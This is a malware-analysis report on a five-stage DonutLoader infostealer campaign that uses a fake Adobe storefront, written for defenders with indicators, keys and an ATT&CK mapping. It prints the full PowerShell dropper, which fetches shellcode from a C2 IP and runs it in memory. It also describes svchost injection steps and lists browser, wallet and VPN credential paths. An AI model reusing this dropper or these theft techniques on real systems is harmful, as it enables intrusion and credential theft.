Severity: Medium | Category: Botnet

Unmasked: A 5-Stage DonutLoader Campaign Hiding Behind a Fake Adobe Storefront

Investigated: March 16, 2026 | Published: March 16, 2026
Tags: botnet, phishing, credential-theft, c2, apt

TL;DR: A fully decrypted 5-stage infection chain -- PowerShell dropper to Donut shellcode to svchost injection to infostealer -- distributes through a fake Adobe Creative Cloud reseller site (adobevault.top). The operator made a fatal OPSEC mistake: both the C2 server and the delivery platform share an identical SSH ECDSA host key, definitively linking the infrastructure to a single operator running on Omegatech bulletproof hosting. We recovered the AES-256 exfiltration key, every Chaskey-16 decryption key, and the complete kill chain.


Why This Matters

Most threat intelligence reports on commodity infostealers stop at the hash and the C2 IP. This investigation goes deeper. We decrypted every layer of a DonutLoader-based campaign end-to-end, extracted the cryptographic keys at each stage, mapped the operator's bulletproof hosting footprint across 18+ subnets, and caught them reusing an SSH host key across two nodes -- a mistake that collapses any plausible deniability between the delivery infrastructure and the command-and-control server.

The operator is running what appears to be a Chinese-nexus Malware-as-a-Service platform on Omegatech LTD infrastructure (AS202412, Seychelles-registered, German-operated), with 145+ Apache hosts across the ASN serving diverse fraud operations alongside this malware campaign.

This is the kind of infrastructure that gets rented, not built from scratch. Understanding its architecture helps defenders recognize not just this campaign, but the next one that reuses the same hosting, the same toolchain, and the same operational patterns.


The Lure: A Convincing Adobe Fraud Operation

The initial access vector is adobevault[.]top -- a polished fake Adobe Creative Cloud reseller platform advertising "Affordable Adobe Plans & Reseller Solutions." The site is no amateur phishing page. It runs nginx 1.18.0 backed by a Node.js/Express application on port 3001, integrates Crisp live chat (ID 5025ffe1-919b-4184-8f3a-3505d78b8c8a), maintains an @adobevault Twitter presence, and obtained a wildcard TLS certificate from Let's Encrypt in February 2026.

The domain was registered on October 8, 2025 through NICENIC INTERNATIONAL GROUP CO., LIMITED -- a Chinese ICANN-accredited registrar that appears repeatedly in cybercriminal domain portfolios. The first TLS certificate was issued just two days later on October 10, and by late November the campaign was actively delivering payloads through the /360 path.

The site sits at 178.16.52[.]119 on Omegatech's network. Remember this IP. It becomes important.


Stage 1: The PowerShell Dropper

The chain starts with downloaded.ps1 -- a 1,491-byte PowerShell script submitted to MalwareBazaar on March 16, 2026 at 03:16 UTC. The payloads it downloads were last modified at 01:13 UTC that same day, meaning the operator had staged fresh binaries roughly two hours before the sample was caught.

The script is deobfuscated below with annotations:

# C2 payload URL -- server enforces WindowsPowerShell User-Agent
$u = "http://178.16.52.201/9cca20c6df659f72/m_cpt1267381.bin"

try {
    $d = Invoke-WebRequest -Uri $u -UseBasicParsing -ErrorAction Stop
    $b = [byte[]]$d.Content    # 52,811 byte Donut shellcode
    $s = $b.Length             # allocation size
    $tid = [uint32]0           # receives the thread id

    # Compile inline C# at runtime -- avoids pre-compiled binary artifacts
    $c = @"
using System;
using System.Runtime.InteropServices;
public class W {
    [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(
        IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(
        IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress,
        IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
    [DllImport("kernel32.dll")] public static extern uint WaitForSingleObject(
        IntPtr hHandle, uint dwMilliseconds);
}
"@
    Add-Type -TypeDefinition $c

    # MEM_COMMIT | MEM_RESERVE (0x3000) with PAGE_EXECUTE_READWRITE (0x40)
    $addr = [W]::VirtualAlloc([IntPtr]::Zero, $s, 0x3000, 0x40)
    [System.Runtime.InteropServices.Marshal]::Copy($b, 0, $addr, $s)

    # Run the blob on a new thread and give it 30 seconds before the script returns
    $th = [W]::CreateThread([IntPtr]::Zero, 0, $addr, [IntPtr]::Zero, 0, [ref]$tid)
    [W]::Wait
ForSingleObject($th, 30000) | Out-Null
} catch { }   # a try block needs a handler to parse; the listing omits its body

Three things stand out:

  1. No AMSI bypass in Stage 1. AMSI scans what PowerShell runs -- the script text and the C# source handed to Add-Type -- not the shellcode once it is executing in a native thread, so the script only has to stay under the signature threshold until CreateThread fires. Donut's optional AMSI/WLDP patch in Stage 2 is aimed at the CLR path (.NET payloads); the PE embedded here is native, so the operator is either confident that a generic P/Invoke shim like this one passes AMSI unmodified, or expects the victim's AV to be absent or already neutralized.

  2. Inline C# compilation via Add-Type. Windows PowerShell compiles a -TypeDefinition through the CodeDOM provider, which spawns csc.exe (and cvtres.exe) as children of powershell.exe and writes temporary .cs, .cmdline and .dll files to %TEMP%. The temporaries are short-lived, but the process-creation and file-creation telemetry is a forensic fingerprint that survives deletion of the script itself.

  3. User-Agent gating on the C2. Send a WindowsPowerShell/5.1.19041.610 UA and you get the payload. Send anything else and you get a 302 redirect to cloudflare.com. This is trivially bypassed but filters out casual scanners and most automated crawlers.

The 16-character hex path /9cca20c6df659f72/ functions as a per-campaign token. The filename pattern m_cpt[7-digit-id].bin suggests a MaaS platform issuing per-victim or per-campaign identifiers.


Stage 2: Donut Shellcode -- Chaskey-16 CTR Decryption

The downloaded m_cpt1267381.bin (52,811 bytes, SHA256: 620b3e0b...) is a Donut-generated x64 position-independent shellcode blob. Its structure:

Offset 0x0000: E8 C0 6B 00 00   CALL 0x6BC5 -- jumps over the instance to the loader; the return address it pushes (0x0005) is the instance pointer, which the loader pops
Offset 0x0005: [0x6BC0 = 27,584 bytes]  DONUT_INSTANCE -- uint32 len and the DONUT_CRYPT {mk, ctr} header in the clear, the remainder Chaskey-CTR encrypted
Offset 0x6BC5: [loader code]    x64 PEB-walking bootstrap

The encryption is Chaskey (16 rounds) in CTR mode, the block cipher Donut uses to obfuscate its instance and module: an ARX permutation in an Even-Mansour wrapper (block XOR key -> 16-round permutation -> result XOR key) is applied to a 16-byte counter and the output is XORed over the data. The counter is incremented as a big-endian integer, starting at byte 15 with carry propagating leftwards, and decryption is the same operation as encryption. Because the loader has to decrypt the instance in memory, the master key and initial counter sit in cleartext at the head of the instance; recovering them is a matter of reading a struct, not cryptanalysis, and that is by design -- Donut's encryption is an obfuscation layer against static scanners, not a secrecy mechanism.

We recovered both keys from the instance header:

Component | Value
key.mk  (128-bit Chaskey master key)    | 227247f00bc963563bc51e3e7cb03b2c
key.ctr (128-bit initial counter/nonce) | 22e1fa6d709b9095e0d731fbd197bbf2

The PEB-walker at offset 0x9a55 resolves API functions without calling LoadLibrary or GetProcAddress directly: it reads the PEB pointer out of the TEB, follows PEB->Ldr into the loaded-module list, and walks each module's export directory comparing hashes of the export names rather than the strings themselves (stock Donut uses its own Maru hash, seeded with a per-instance 64-bit IV, rather than FNV-1a):

mov rax, qword ptr gs:[0x30]    ; TEB
mov r9,  qword ptr [rax + 0x60] ; TEB->ProcessEnvironmentBlock (PEB)
mov rax, qword ptr [r9 + 0x18]  ; PEB->Ldr
mov rbx, qword ptr [rax + 0x10] ; Ldr->InLoadOrderModuleList.Flink (+0x20 would be InMemoryOrderModuleList)

An anti-disassembly trick at 0x6BC6 uses a dead conditional jump (xor eax, eax sets ZF=1 and SF=0, so a subsequent js is never taken) to confuse linear disassemblers.

After decryption, the DONUT_MODULE structure reveals the inner payload:

+0x0000  DLL names: "ole32;oleaut32;wininet;mscoree;shell32"
+0x104C  MZ signature -- payload.exe starts here
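
As an added example (not part of the GHOST investigation package and not Donut's own source), the Python below reproduces the Stage 2 decryption step: it decodes the leading CALL to bound the instance, reads len, mk and ctr from the cleartext header, runs Donut's Chaskey-CTR over the remainder, and looks for the embedded MZ. The instance-relative offset at which encryption begins (enc_start) is taken as a parameter, because the exact figure depends on the DONUT_INSTANCE layout of the Donut version that built the sample; the blob decrypted here is constructed around the report's Stage 2 keys, not the real m_cpt1267381.bin.

```python
import struct

MASK32 = 0xFFFFFFFF
STUB_LEN = 5                       # E8 rel32 CALL that jumps over the instance
HDR = struct.Struct("<I16s16s")    # DONUT_INSTANCE head: uint32 len, DONUT_CRYPT {mk, ctr}


def _rotl(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK32


def chaskey_block(mk, block):
    """Donut's Chaskey variant: block XOR key, 16 ARX rounds, result XOR key."""
    k = struct.unpack("<4I", mk)
    v = [x ^ y for x, y in zip(struct.unpack("<4I", block), k)]
    for _ in range(16):
        v[0] = (v[0] + v[1]) & MASK32
        v[1] = _rotl(v[1], 5) ^ v[0]
        v[0] = _rotl(v[0], 16)
        v[2] = (v[2] + v[3]) & MASK32
        v[3] = _rotl(v[3], 8) ^ v[2]
        v[0] = (v[0] + v[3]) & MASK32
        v[3] = _rotl(v[3], 13) ^ v[0]
        v[2] = (v[2] + v[1]) & MASK32
        v[1] = _rotl(v[1], 7) ^ v[2]
        v[2] = _rotl(v[2], 16)
    return struct.pack("<4I", *[x ^ y for x, y in zip(v, k)])


def donut_ctr(mk, ctr, data):
    """CTR mode as Donut implements it: encrypt the 16-byte counter, XOR the
    keystream into the data, then increment the counter big-endian (byte 15
    first, carrying leftwards). Encrypt and decrypt are the same function."""
    counter = bytearray(ctr)
    out = bytearray()
    for off in range(0, len(data), 16):
        ks = chaskey_block(mk, bytes(counter))
        out += bytes(a ^ b for a, b in zip(data[off:off + 16], ks))
        for i in range(15, -1, -1):
            counter[i] = (counter[i] + 1) & 0xFF
            if counter[i]:
                break
    return bytes(out)


def call_target(blob):
    """Decode the leading E8 rel32; the target is the loader, so the instance
    occupies [5, target). E8 C0 6B 00 00 -> 0x6BC5."""
    if blob[0] != 0xE8:
        raise ValueError("blob does not start with CALL rel32")
    return STUB_LEN + struct.unpack_from("<i", blob, 1)[0]


def decrypt_instance(blob, enc_start):
    """Read len/mk/ctr from the clear header and decrypt the rest of the instance.
    enc_start is the instance-relative offset of the first encrypted byte; Donut
    leaves a few more header fields in the clear, so take the value from the
    DONUT_INSTANCE layout of the Donut build in hand (assumption: not derived here)."""
    inst = blob[STUB_LEN:call_target(blob)]
    length, mk, ctr = HDR.unpack_from(inst, 0)
    if length != len(inst):
        raise ValueError("header len %d != instance size %d" % (length, len(inst)))
    return mk, ctr, inst[:enc_start] + donut_ctr(mk, ctr, inst[enc_start:length])


def find_module_pe(plain):
    """Offset of the embedded PE inside the decrypted instance, or -1."""
    return plain.find(b"MZ")


def build_sample():
    """Constructed sample: the report's Stage 2 key material wrapped around a fake
    instance body, so the parse/decrypt path can be exercised offline."""
    mk = bytes.fromhex("227247f00bc963563bc51e3e7cb03b2c")
    ctr = bytes.fromhex("22e1fa6d709b9095e0d731fbd197bbf2")
    body = b"ole32;oleaut32;wininet;mscoree;shell32\x00" + b"\x00" * 9 + b"MZ\x90\x00fake-pe"
    inst = HDR.pack(HDR.size + len(body), mk, ctr) + donut_ctr(mk, ctr, body)
    return b"\xE8" + struct.pack("<i", len(inst)) + inst + b"\xCC"   # loader placeholder


if __name__ == "__main__":
    mk, ctr, plain = decrypt_instance(build_sample(), HDR.size)
    print("mk=%s ctr=%s MZ at 0x%X" % (mk.hex(), ctr.hex(), find_module_pe(plain)))
```

On a real sample the DLL-name list and the MZ fall out at the offsets the report quotes only if enc_start is right; a wrong offset produces garbage from the first block onward, which is the quickest sanity check when carving an unfamiliar Donut build.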

Stage 3: The Native Stager -- Privilege Escalation and Process Injection

Extracted from the Donut wrapper, payload.exe (22,840 bytes, SHA256: 064fc244...) is a MinGW-w64 binary cross-compiled with GCC 15.1.0 on Linux. It is not obfuscated -- the operator apparently trusts the Donut encryption and in-memory execution to evade detection.

The stager runs four steps: enable SeDebugPrivilege, locate an svchost.exe, fetch Stage 4 from the C2, and inject it.

1. Token Adjustment -- SeDebugPrivilege

OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &tp.Privileges[0].Luid);
tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

This is not an escalation. AdjustTokenPrivileges can only enable a privilege the token already holds in a disabled state, which is the case for an elevated administrator; from a standard-user token the call reports ERROR_NOT_ALL_ASSIGNED and a later OpenProcess on a SYSTEM-owned svchost.exe is denied. With the privilege enabled, the process can open handles to any non-protected process regardless of its DACL, including the SYSTEM-owned service hosts it targets next; PPL processes remain out of reach.

2. Target Acquisition -- svchost.exe Enumeration

CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
Process32FirstW(...);
// Walk with Process32NextW until wcscmp(pe32.szExeFile, L"svchost.exe") == 0

The stager takes the first svchost.exe it meets in the snapshot as the injection target. Which service host that is depends on process creation order, so the injected process varies from victim to victim.

3. Payload Retrieval -- WinHTTP

Before it can write anything into the target, the stager fetches the second Donut payload over WinHTTP (this necessarily precedes the injection below, whatever order the strings appear in):

WinHttpConnect(session, L"178.16.52.201", 80, 0)
WinHttpOpenRequest(conn, L"GET", L"/9cca20c6df659f72/m_cpt_bld172638.bin", ...)

4. Process Injection -- Classic CreateRemoteThread

VirtualAllocEx     -> Allocate RWX memory in svchost.exe
WriteProcessMemory -> Copy the Stage 4 Donut shellcode into the allocation
CreateRemoteThread -> Start a thread at the allocation in the svchost.exe context

Wide strings extracted from the binary give away the entire operation without any dynamic analysis:

178.16.52.201
/9cca20c6df659f72/m_cpt_bld172638.bin
svchost.exe
nsvchost.exe     <-- process name spoof
powershell

Stage 4: Second Donut Layer

m_cpt_bld172638.bin (254,027 bytes, SHA256: 145dace2...) is another Donut-generated shellcode using the same Chaskey-16 CTR cipher with different keys:

Component | Value
key.mk    | e50cc01a0ec280afc5cfde29c4d31e2b
key.ctr   | 8d31a9d17c9b518ccaff90f3a0b2e81a

The _bld in the filename likely stands for "build" -- this is the production payload as opposed to the lightweight stager. The encrypted instance is 228,800 bytes, containing the full infostealer PE.


Stage 5: The Infostealer -- Full Credential Harvester

The final payload stage3_payload.exe (224,056 bytes, SHA256: 4c5d762a...) is the crown jewel: a comprehensive infostealer compiled with the same MinGW-w64 GCC 15.x Linux cross-compilation toolchain as Stage 3.

Hardcoded AES-256 Key

Sitting in plaintext in the binary:

sysinfo_aes256_channel_key_2024!!

This string is the key material used with Windows bcrypt.dll (BCryptGenerateSymmetricKey, then BCryptEncrypt/BCryptDecrypt) to encrypt all exfiltrated data before transmission. Two caveats for anyone building a decryptor: AES-256 takes exactly 32 key bytes and the string as printed is 33 characters, so the stealer hands BCrypt a slice or a derived form of it; and the chaining mode and IV handling are set on the key object at runtime. Both have to be replayed from the binary rather than guessed. With those in hand, anyone with a network capture of C2 traffic from an infected host can decrypt the exfiltration stream.

The sysinfo_ prefix is consistent with naming conventions observed in several Chinese infostealer families. The 2024 in the key suggests this tooling (or at least its crypto layer) dates to at least 2024, predating the campaign infrastructure registered in late 2025.

Credential Targets

The stealer targets six Chromium-family browsers:

Browser  | Path
Chrome   | %LOCALAPPDATA%\Google\Chrome\User Data\
Edge     | %LOCALAPPDATA%\Microsoft\Edge\User Data\
Brave    | %LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\
Opera    | %APPDATA%\Opera Software\Opera Stable\
Opera GX | %APPDATA%\Opera Software\Opera GX Stable\
Vivaldi  | %LOCALAPPDATA%\Vivaldi\User Data\

From each, it extracts Login Data (saved passwords), Cookies, Web Data (autofill), and History.

Cryptocurrency Wallet Targeting

The stealer enumerates 100+ Chrome extension IDs for cryptocurrency wallets and password managers, including:

nkbihfbeogaeaoehlefnkodbefgpgknn  MetaMask
bfnaelmomeimhlpmgjnjophhpkkoljpa  Phantom (Solana)
ibnejdfjmmkpcnlpebklmnkoeoihofec  TronLink
fooolghllnmhmmndgjiamiiodkpenpbb  Ledger Live
hdokiejnpimakedhajhdlcegeplioahd  LastPass
aeblfdkhhhdcdjpifhhbdiojplfjncoa  1Password

It also targets local wallet application data:

%APPDATA%\Exodus\
%APPDATA%\Electrum\wallets\
%APPDATA%\Ethereum\keystore\
%APPDATA%\.monero-project\
%APPDATA%\Bitcoin\
%APPDATA%\Atomic\
%APPDATA%\Coinomi\

Additional Capabilities

  • Screenshot capture via GDI32/gdiplus BitBlt
  • OpenVPN credential theft from %APPDATA%\OpenVPN Connect\profiles\ and %USERPROFILE%\OpenVPN\auth.txt
  • Persistence via silent MSI installation: downloads install.msi (2.3 MB) from the C2 and runs msiexec /i install.msi /quiet /norestart (what the package installs was not examined here)
  • Chrome browser injection via a secondary module chromelevator.bin (1.4 MB) downloaded from the C2 to hook Chrome's processes. The name matches the public ChromElevator tooling for defeating Chrome's App-Bound Encryption (Chrome 127 and later), which is why modern Cookies and Login Data databases cannot be unwrapped with DPAPI alone from the user's context; if that is what the module is, it is the credential-decryption path rather than an add-on
  • Process masquerading as nsvchost.exe -- a single prepended n that blends into a process list at a glance

The OPSEC Failure That Ties It All Together

The operator's most damaging mistake is simple: both 178.16.52[.]201 (the C2 payload server) and 178.16.52[.]119 (the adobevault[.]top delivery site) present the same SSH ECDSA host key.

Fingerprint (MD5): 6f:1f:3b:94:fa:7f:a7:77:26:35:1a:b8:d9:78:f6:99

Full ECDSA Public Key (ecdsa-sha2-nistp256, wire-format blob):
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGM+2TVtpCgr
bUudFMDpfgPOxAP2OwO75dpegTZOTuB/Jsj0dg3cyBjb7k/waOuwH1TsdEFM95YL
MBT9defY5GE=

HASSH (server side, i.e. hasshServer): 41ff3ecd1458b0bf86e1b4891636213e

SSH host keys are generated per-server at first boot or package installation. Two machines presenting the same key means one of two things: one was cloned from the other (typically a VM image whose host keys were never regenerated after cloning), or the key was copied between them by hand. Either way the two hosts share an origin, and here they also sit in the same /24 and serve consecutive stages of one infection chain, so the "legitimate-looking" Adobe storefront and the backend C2 collapse into a single, attributable operation. The host-key fingerprint is the strong link; the HASSH value only identifies the SSH server build and its algorithm list, which every host running the same OpenSSH package shares.
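
To check the shared-key claim yourself rather than take the printed fingerprint on trust, here is an added Python example (not GHOST's tooling) that parses the wire-format key printed above, computes the MD5 and SHA256 fingerprints the way ssh-keygen -l does (over the raw blob), and groups hosts by fingerprint to surface reuse. The observation table is constructed: the two report IPs are paired with the report's key, and 203.0.113.10 with a dummy ed25519 key that exists only to show a non-matching host.

```python
import base64
import hashlib
import struct

# The report's ECDSA host key (wire-format blob, base64), as it would appear in a
# known_hosts line or in a scanner's raw-key field.
REPORTED_KEY_B64 = (
    "AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGM+2TVtpCgr"
    "bUudFMDpfgPOxAP2OwO75dpegTZOTuB/Jsj0dg3cyBjb7k/waOuwH1TsdEFM95YL"
    "MBT9defY5GE="
)
REPORTED_MD5 = "6f:1f:3b:94:fa:7f:a7:77:26:35:1a:b8:d9:78:f6:99"


def _ssh_string(data):
    """SSH wire-format string: uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


# Constructed observations: the two report IPs presenting the report's key, plus an
# unrelated host with a dummy ed25519 key (hypothetical, not from the report).
OBSERVED = {
    "178.16.52.201": "ecdsa-sha2-nistp256 " + REPORTED_KEY_B64,
    "178.16.52.119": "ecdsa-sha2-nistp256 " + REPORTED_KEY_B64,
    "203.0.113.10": "ssh-ed25519 " + base64.b64encode(
        _ssh_string(b"ssh-ed25519") + _ssh_string(b"\x11" * 32)).decode(),
}


def parse_pubkey(line):
    """Split a '<type> <base64>' host key into its wire-format fields and check
    that the type string inside the blob matches the declared type."""
    ktype, b64 = line.split()[:2]
    raw = base64.b64decode(b64)
    fields, pos = [], 0
    while pos < len(raw):
        (n,) = struct.unpack_from(">I", raw, pos)
        fields.append(raw[pos + 4:pos + 4 + n])
        pos += 4 + n
    if pos != len(raw) or fields[0] != ktype.encode():
        raise ValueError("malformed key blob for %s" % ktype)
    return {"type": ktype, "fields": fields, "raw": raw}


def fingerprints(raw):
    """OpenSSH-style fingerprints over the raw blob (the same input ssh-keygen -l hashes)."""
    md5 = hashlib.md5(raw).hexdigest()
    sha = base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")
    return {"MD5": ":".join(md5[i:i + 2] for i in range(0, 32, 2)), "SHA256": "SHA256:" + sha}


def find_reuse(observed):
    """Group hosts by host-key fingerprint; any group larger than one is key reuse."""
    groups = {}
    for host, line in observed.items():
        fp = fingerprints(parse_pubkey(line)["raw"])["SHA256"]
        groups.setdefault(fp, []).append(host)
    return {fp: sorted(hosts) for fp, hosts in groups.items() if len(hosts) > 1}


def matches_report(raw):
    """True if the MD5 fingerprint of raw equals the one printed in the report."""
    return fingerprints(raw)["MD5"] == REPORTED_MD5


if __name__ == "__main__":
    key = parse_pubkey(OBSERVED["178.16.52.201"])
    print(key["type"], key["fields"][1].decode(), fingerprints(key["raw"]))
    print("matches report:", matches_report(key["raw"]))
    print("reuse:", find_reuse(OBSERVED))
```

The parser enforces that the blob's own type string equals the declared type and that the fields consume the blob exactly; a scanner that records only a fingerprint cannot give you that check, which is one reason to keep raw keys in the collection. Feed find_reuse the host-key column of your own scan data to find further nodes sharing this key.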

This was not the only mistake:

OPSEC Failure | Impact
Shared SSH host key across two nodes | Definitively links C2 to delivery infrastructure
All 4 payload URLs live for 12+ hours | Full stage-by-stage chain recovery
User-Agent gating only (no IP filtering) | Trivially bypassed with curl -A "WindowsPowerShell/5.1..."
Hardcoded AES-256 key in plaintext | Enables decryption of all exfiltrated C2 traffic
Unobfuscated wide strings in Stage 3 PE | Full IOC extraction without execution
Open directory listing on wc-gateway[.]com | Staging area contents disclosed
C2 IP flagged in MalwareFilter since Dec 2025 | 3 months of historical tracking pre-submission

Infrastructure: Omegatech's Bulletproof Empire

The entire campaign runs on Omegatech LTD (AS202412), a textbook bulletproof hosting operation: registered in the Seychelles, operationally based in Dusseldorf, Germany, with upstream transit through dus.net GmbH. The ASN was allocated in August 2025 -- just weeks before the adobevault[.]top domain was registered.

Our scan of the ASN revealed approximately 145 Apache/2.4.58 hosts across 18+ /24 subnets. The infrastructure is not limited to this malware campaign. Adjacent IPs host:

178.16.52.0/24  (primary cluster)
  .201  DonutLoader C2 (this campaign)
  .119  adobevault.top delivery (linked via SSH key)
  .182  hosting.proactlve.co.in -- cPanel hosting, CERT.PL flagged
  .142  wc-gateway.com -- Windows host, WinRM + SMB open, open directory
  .150  luckydragon.bet -- crypto gambling
  .84   neomarkets.io -- fake crypto trading platform
  .175  allpay.finance -- financial phishing

178.16.55.0/24  (secondary cluster)
  .133  apparaatopwebplatform.ru -- C2 node that answers unauthenticated requests with 403
  .194  Active phishing node

91.92.240.0/22  (auxiliary cluster)
  91.92.243.149  helpconnectpc.online / serviceconnecting.com -- ScreenConnect abuse
  91.92.242.75   corner2stone.com -- crypto investment scam
  91.92.240.23   coinpassledger.org -- Ledger phishing

The diversity -- malware C2, fake Adobe storefronts, crypto scams, ScreenConnect abuse, cPanel hosting -- is characteristic of a MaaS platform renting infrastructure to multiple operators or a single sophisticated group running parallel fraud campaigns.


Attribution Assessment

Confidence: MEDIUM -- Chinese-nexus MaaS operator

The evidence points converge on a Chinese-nexus operation, though every individual indicator is circumstantial and several are shared with unrelated actors:

  1. Registrar selection: Both adobevault[.]top (NICENIC) and wc-gateway[.]com (CNOBIN) were registered through Chinese ICANN-accredited registrars that appear disproportionately in Chinese cybercriminal campaigns
  2. Toolchain: DonutLoader with MinGW-w64 cross-compiled Windows payloads built on Linux -- documented TTPs for multiple Chinese threat groups, but equally common in red-team tooling and in crimeware of every origin, so this carries little weight on its own
  3. Key naming: The sysinfo_ prefix in the AES key matches conventions in known Chinese infostealer families
  4. Infrastructure model: Seychelles-registered BPH with German operations is a structure favored by Chinese MaaS resellers
  5. Scale: 145+ hosts, 18+ subnets, mixed fraud and malware -- suggests a commercial operation, not a lone actor

The campaign path pattern (/[16-hex]/m_cpt[7-digit].bin) and per-victim ID structure further support the MaaS hypothesis: this infrastructure is likely rented to downstream operators who customize their lures while sharing the backend toolchain.


Campaign Timeline

Date | Event
2025-08-18 | Omegatech AS202412 allocated; megatechends[.]com registered
2025-10-08 | adobevault[.]top registered via NICENIC (Chinese registrar)
2025-10-10 | First TLS certificate issued for adobevault[.]top
2025-10-17 | /inquiry path active on C2 -- early operational testing
2025-11-23 | C2 IP appears in malware-filter botnet lists
2025-11-26 | /360 campaign delivery path active on adobevault[.]top
2025-12-12 | C2 IP added to MalwareFilter Botnet List
2026-02-13 | Wildcard cert *.adobevault[.]top issued -- infrastructure expansion
2026-02-21 | wc-gateway[.]com registered -- new infrastructure node
2026-03-16 01:13 UTC | Fresh payloads staged on C2
2026-03-16 03:16 UTC | Sample submitted to MalwareBazaar
2026-03-16 | All 4 payload URLs confirmed live during our analysis

The operator has been active for at least 5 months, with the C2 IP flagged in public blocklists for 3 months before a sample was formally submitted. This gap between reputation burn and public sample availability is concerning -- it means the campaign was operating successfully for months while defenses that rely solely on hash-based detection would have missed it entirely.


MITRE ATT&CK Mapping

Tactic | Technique | ID | Application
Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | Invoke-WebRequest + Add-Type inline C#
Defense Evasion | Reflective Code Loading | T1620 | Donut decrypts and maps the PE in memory
Defense Evasion | Obfuscated Files or Information: Embedded Payloads | T1027.009 | Chaskey-CTR-encrypted Donut instances
Defense Evasion | Obfuscated Files or Information: Compile After Delivery | T1027.004 | Stage 1 compiles its P/Invoke shim with Add-Type at runtime (no trust control is subverted, so T1553 does not apply)
Defense Evasion | Masquerading: Match Legitimate Name or Location | T1036.005 | Process named nsvchost.exe
Defense Evasion / Privilege Escalation | Access Token Manipulation | T1134 | SeDebugPrivilege enabled via AdjustTokenPrivileges (no token theft or impersonation, so T1134.001 does not fit)
Discovery | Process Discovery | T1057 | CreateToolhelp32Snapshot walk for svchost.exe
Defense Evasion / Privilege Escalation | Process Injection | T1055 | VirtualAllocEx + WriteProcessMemory + CreateRemoteThread of shellcode into svchost.exe (shellcode, not a DLL, so T1055.001 does not apply; injection is not lateral movement)
Collection | Screen Capture | T1113 | GDI BitBlt screenshot
Credential Access | Credentials from Password Stores: Credentials from Web Browsers | T1555.003 | Chrome/Edge/Brave/Opera/Vivaldi credential theft
Credential Access | Steal Web Session Cookie | T1539 | Cookie file theft from Chromium browsers
Credential Access | Unsecured Credentials: Credentials In Files | T1552.001 | OpenVPN auth.txt, crypto wallet files
Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | HTTP for payload delivery and exfiltration
Command and Control | Encrypted Channel: Symmetric Cryptography | T1573.001 | AES-256 encrypted exfiltration channel
Defense Evasion | System Binary Proxy Execution: Msiexec | T1218.007 | msiexec /i install.msi /quiet /norestart (the persistence the MSI establishes was not examined, so no T1547 sub-technique is assigned)
Resource Development | Acquire Infrastructure: Server | T1583.004 | Omegatech LTD bulletproof hosting

Complete IOC Table

File Hashes

Stage | SHA256 | MD5 | Description
1 | 03e4185a6e817ffa0957b0a8091f328232bd0d5dab4246c892c344188997b888 | f4fa194ae1b76d62d11a357c495d1e2a | PS1 dropper
2 | 620b3e0b1d3e4d8c6aef5c5a4f52d092c94d0f583f37f30b17a5854f7fb6b933 | d06cb6840b645fa6012e763b1b3b4334 | Donut shellcode (52 KB)
3 | 064fc244c2aaf7e602cf53b725f0355df44bc4e13719fb5bd959efa09887586a | b6f956caa93732c22c9b5a820f0503c2 | Native stager PE
4 | 145dace286f5c5e96d4627073f8c78c63166dd50a52ba23c3e21dc466d8fef7c | 0129c59c211d038f6bcc5d0130fe4cde | Donut shellcode (254 KB)
5 | 4c5d762a8894e4b85c96526d67f0f9a182eb59f17a12e980199d52763428b1b9 | 420acb17c64315193cdece359abf88e3 | Infostealer PE

Cryptographic Keys

Artifact | Value
Stage 2 Donut key.mk  | 227247f00bc963563bc51e3e7cb03b2c
Stage 2 Donut key.ctr | 22e1fa6d709b9095e0d731fbd197bbf2
Stage 4 Donut key.mk  | e50cc01a0ec280afc5cfde29c4d31e2b
Stage 4 Donut key.ctr | 8d31a9d17c9b518ccaff90f3a0b2e81a
Infostealer AES-256   | sysinfo_aes256_channel_key_2024!!

Network Indicators

Indicator | Role
178.16.52[.]201 | Primary C2 / payload server
178.16.52[.]119 | adobevault[.]top delivery (linked SSH key)
178.16.52[.]182 | proactlve[.]co[.]in cPanel host
178.16.52[.]142 | wc-gateway[.]com Windows host
178.16.55[.]133 | apparaatopwebplatform[.]ru C2 node
178.16.55[.]194 | Active phishing node
91.92.243[.]149 | ScreenConnect abuse
adobevault[.]top | Fake Adobe reseller (delivery)
wc-gateway[.]com | Staging infrastructure
proactlve[.]co[.]in | Typosquat cPanel hosting
apparaatopwebplatform[.]ru | 403-gated C2 node
helpconnectpc[.]online | ScreenConnect abuse
serviceconnecting[.]com | ScreenConnect abuse

C2 URLs

hxxp://178.16.52[.]201/9cca20c6df659f72/m_cpt1267381.bin       (Stage 2 Donut)
hxxp://178.16.52[.]201/9cca20c6df659f72/m_cpt_bld172638.bin     (Stage 4 Donut)
hxxp://178.16.52[.]201/9cca20c6df659f72/install.msi             (MSI persistence)
hxxp://178.16.52[.]201/9cca20c6df659f72/chromelevator.bin        (Chrome injector)
hxxps://adobevault[.]top/                                        (Initial lure)
hxxps://adobevault[.]top/360                                     (Campaign delivery)

SSH Infrastructure

Field | Value
ECDSA Fingerprint (MD5) | 6f:1f:3b:94:fa:7f:a7:77:26:35:1a:b8:d9:78:f6:99
HASSH (hasshServer) | 41ff3ecd1458b0bf86e1b4891636213e
Shared by | 178.16.52[.]201 and 178.16.52[.]119

Host-Based Indicators

Artifact | Description
downloaded.ps1 | Stage 1 filename
m_cpt1267381.bin | Stage 2 filename pattern
m_cpt_bld172638.bin | Stage 4 filename pattern
nsvchost.exe | Masquerade process name
sysinfo_aes256_channel_key_2024!! | Hardcoded AES key in binary
